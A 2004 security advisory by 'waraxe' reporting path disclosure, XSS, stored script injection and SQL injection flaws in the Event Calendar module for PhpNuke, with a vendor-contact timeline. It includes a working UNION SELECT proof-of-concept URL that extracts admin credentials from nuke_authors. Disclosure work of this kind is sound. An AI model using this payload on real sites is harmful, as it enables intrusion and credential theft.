[waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar module for PhpNuke]
{================================================================================}
{ [waraxe-2004-SA#038]
}
{================================================================================}
{
}
{ [ Multiple vulnerabilities in Event Calendar module for PhpNuke ]
}
{
}
{================================================================================}
Author: Janek Vind "waraxe"
Date: 17. November 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=38
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004
Module's Description: Provides an event calendar for PHP-Nuke communities.
License: GNU/GPL
Author's Name: Original author - Rob Sutton. Development continued by
Holbrookau.
Author's Email: phpnuke@xxxxxxxxxxxxxx
Event Calendar - a module for PHP-Nuke.
Based on version 1.5 by Rob Sutton, the Event Calendar found here is much
updated
and features many improvments and add-ons. For example, the administration area
features
configuration via a graphical interface, posting of events can be moderated and
users even
have the option of adding comments to any event.
Homepage: http://phpnuke.holbrookau.net/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This piece of sowtware has many security related flaws due to poor
user-submitted data
handling.
A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A1 - full path disclosure in "config.php":
http://localhost/nuke73/modules/Calendar/config.php
Warning: main(modules/Calendar/configset.php): failed to open stream: No such
file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on
line 11
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion
(include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(mainfile.php): failed to open stream: No such file or directory
in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(): Failed opening 'mainfile.php' for inclusion
(include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(modules//language/lang-english.php): failed to open stream: No
such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php
on line 19
Warning: main(): Failed opening 'modules//language/lang-english.php' for
inclusion (include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19
A2, A3 - full path disclosure in "index.php" and "submit.php":
http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php
B - XSS aka cross site scripting:
Examples:
http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code
here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss
code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss
code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss
code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss
code here]
C - script injection in calendar event comments:
It's serious bug - anyone can insert javascript exploit code to event comments
and if user or admin will read it, javascript will trigger and bad things can
happen - like cookie theft, arbitrary admin operations, etc.
D - critical sql injection bugs in code:
If we take a deep look at source code, then there can be found multiple sql
queries,
where some variables, mostly "$eid" and "$cid" ARE NOT surrounded with single
quotes.
Therefore sql injection is possible. Further exploitation will depend on
database
software and version. In case of the mysql version 4.x with UNION functionality
enabled,
arbitrary data can be retrieved from database, inluding admin(s) authentication
credentials.
As tradition, there is proof of concept:
----------------[ real life exploit ]---------------
http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT
%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1
----------------[/real life exploit ]---------------
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08. September 2004
Since then no more response from software developer and downloadable version
still unpatched.
For help with patching look @ here - http://www.waraxe.us/forums.html
Additional recources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool -
http://base64-encoder-online.waraxe.us/base64/base64-encoder.php
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna, icenix, g0df4th3r and slimjim100!
Tervitused - Heintz ja Maku!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@xxxxxxxxx
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------